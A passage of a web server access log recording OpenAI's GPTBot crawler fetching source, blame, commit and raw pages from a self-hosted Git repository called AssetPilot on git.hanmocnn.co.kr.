GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/README.md" +[17/Feb/2026:13:35:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.gitignore" [Client 74.7.227.38] [Length 11104] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47" +[17/Feb/2026:13:35:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker" [Client 74.7.227.38] [Length 15975] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47" +[17/Feb/2026:13:35:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument" [Client 74.7.227.38] [Length 12609] [Gzip 3.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47" +[17/Feb/2026:13:35:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47" [Client 74.7.227.38] [Length 10546] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47" +[17/Feb/2026:13:35:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/find/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47" [Client 74.7.227.38] [Length 7513] [Gzip 2.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47" +[17/Feb/2026:13:35:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/import_csv.py" [Client 74.7.227.38] [Length 9935] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/import_csv.py" +[17/Feb/2026:13:36:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 7692349] [Gzip 11.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom3.png" +[17/Feb/2026:13:36:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 71824] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" +[17/Feb/2026:13:36:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app/fetcher.py.claude" [Client 74.7.227.38] [Length 15277] [Gzip 4.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/fetcher.py.claude" +[17/Feb/2026:13:36:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/graph" [Client 74.7.227.38] [Length 10415] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a" +[17/Feb/2026:13:36:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/requirements.txt" [Client 74.7.227.38] [Length 11358] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker" +[17/Feb/2026:13:36:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.gitignore" [Client 74.7.227.38] [Length 119] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.gitignore" +[17/Feb/2026:13:36:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/Dockerfile" [Client 74.7.227.38] [Length 12447] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker" +[17/Feb/2026:13:36:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/index.html" [Client 74.7.227.38] [Length 16335] [Gzip 5.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument" +[17/Feb/2026:13:36:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/QUICKSTART.md" [Client 74.7.227.38] [Length 12752] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument" +[17/Feb/2026:13:36:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/assetpilot.ico" [Client 74.7.227.38] [Length 10826] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument" +[17/Feb/2026:13:36:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/init_db.py" [Client 74.7.227.38] [Length 16152] [Gzip 5.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker" +[17/Feb/2026:13:36:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/claude.md" [Client 74.7.227.38] [Length 13423] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument" +[17/Feb/2026:13:36:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/templates" [Client 74.7.227.38] [Length 10003] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker" +[17/Feb/2026:13:36:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/index.html.good2" [Client 74.7.227.38] [Length 14692] [Gzip 4.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument" +[17/Feb/2026:13:36:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/import_csv.py" [Client 74.7.227.38] [Length 14273] [Gzip 4.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker" +[17/Feb/2026:13:36:11 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker" +[17/Feb/2026:13:36:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app/fetcher.py.claude" [Client 74.7.227.38] [Length 15512] [Gzip 9.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app/fetcher.py.claude" +[17/Feb/2026:13:36:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/Dockerfile" [Client 74.7.227.38] [Length 11872] [Gzip 4.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/Dockerfile" +[17/Feb/2026:13:36:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/index.html" [Client 74.7.227.38] [Length 9879] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/index.html" +[17/Feb/2026:13:36:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/index.html" [Client 74.7.227.38] [Length 6870] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/index.html" +[17/Feb/2026:13:36:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/index.html" [Client 74.7.227.38] [Length 17126] [Gzip 9.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/index.html" +[17/Feb/2026:13:36:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/Dockerfile" [Client 74.7.227.38] [Length 859] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/Dockerfile" +[17/Feb/2026:13:36:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/assetpilot.ico" [Client 74.7.227.38] [Length 259720] [Gzip 13.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/assetpilot.ico" +[17/Feb/2026:13:36:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/claude.md" [Client 74.7.227.38] [Length 15450] [Gzip 8.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/claude.md" +[17/Feb/2026:13:36:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/QUICKSTART.md" [Client 74.7.227.38] [Length 14869] [Gzip 9.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/QUICKSTART.md" +[17/Feb/2026:13:36:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/QUICKSTART.md" [Client 74.7.227.38] [Length 2208] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/QUICKSTART.md" +[17/Feb/2026:13:36:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/assetpilot.ico" [Client 74.7.227.38] [Length 9927] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/assetpilot.ico" +[17/Feb/2026:13:36:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/assetpilot.ico" [Client 74.7.227.38] [Length 237700] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/assetpilot.ico" +[17/Feb/2026:13:36:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/QUICKSTART.md" [Client 74.7.227.38] [Length 9931] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/QUICKSTART.md" +[17/Feb/2026:13:36:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/index.html.good2" [Client 74.7.227.38] [Length 9886] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/index.html.good2" +[17/Feb/2026:13:36:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/claude.md" [Client 74.7.227.38] [Length 9926] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/claude.md" +[17/Feb/2026:13:36:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/init_db.py" [Client 74.7.227.38] [Length 5009] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/init_db.py" +[17/Feb/2026:13:36:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/Dockerfile" [Client 74.7.227.38] [Length 9921] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/Dockerfile" +[17/Feb/2026:13:36:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/templates" [Client 74.7.227.38] [Length 9932] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/templates" +[17/Feb/2026:13:36:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/claude.md" [Client 74.7.227.38] [Length 4068] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/claude.md" +[17/Feb/2026:13:36:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/index.html.good2" [Client 74.7.227.38] [Length 5799] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/index.html.good2" +[17/Feb/2026:13:36:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/index.html.good2" [Client 74.7.227.38] [Length 14751] [Gzip 9.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/index.html.good2" +[17/Feb/2026:13:36:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/templates/index.html" [Client 74.7.227.38] [Length 15725] [Gzip 5.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/templates" +[17/Feb/2026:13:36:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/import_csv.py" [Client 74.7.227.38] [Length 2651] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/import_csv.py" +[17/Feb/2026:13:36:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/init_db.py" [Client 74.7.227.38] [Length 16597] [Gzip 8.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/init_db.py" +[17/Feb/2026:13:36:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/init_db.py" [Client 74.7.227.38] [Length 9931] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/init_db.py" +[17/Feb/2026:13:36:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/DOCKER_QUICKSTART.md" [Client 74.7.227.38] [Length 14299] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument" +[17/Feb/2026:13:36:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.gitignore" [Client 74.7.227.38] [Length 10163] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.gitignore" +[17/Feb/2026:13:36:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker" [Client 74.7.227.38] [Length 9906] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker" +[17/Feb/2026:13:36:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/MIGRATION_GUIDE.md" [Client 74.7.227.38] [Length 15789] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument" +[17/Feb/2026:13:36:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr 